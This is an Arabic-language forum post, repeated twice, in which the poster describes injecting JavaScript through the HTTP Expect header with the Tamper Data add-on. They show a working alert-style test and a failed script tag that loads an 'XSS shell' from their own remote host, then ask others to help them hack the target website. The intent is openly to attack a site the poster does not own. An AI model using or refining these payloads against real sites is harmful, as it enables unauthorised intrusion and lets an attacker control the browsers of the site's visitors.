XSS headers injection
مرحبا اعزائي
وجدت ثغرة XSS Headers Injection
باستخدام tamper data استطيع اضافه Expect وبعدها ممكن اكتب اي كود مثلا
***************("Hello")</script>
ويظهر لي hello
بس المشكله لما حاولت ارفع شل XSS ما رضى يصير
عن طريق الكود
********** src="http://mysite.com/xssshell/xssshell.asp" </script>
ممكن احد يساعدني في اختراق هذا الموقع ؟؟
وجدت ثغرة XSS Headers Injection
باستخدام tamper data استطيع اضافه Expect وبعدها ممكن اكتب اي كود مثلا
***************("Hello")</script>
ويظهر لي hello
بس المشكله لما حاولت ارفع شل XSS ما رضى يصير
عن طريق الكود
********** src="http://mysite.com/xssshell/xssshell.asp" </script>
ممكن احد يساعدني في اختراق هذا الموقع ؟؟
اسم الموضوع : XSS headers injection
|
المصدر : حقن xss - ssi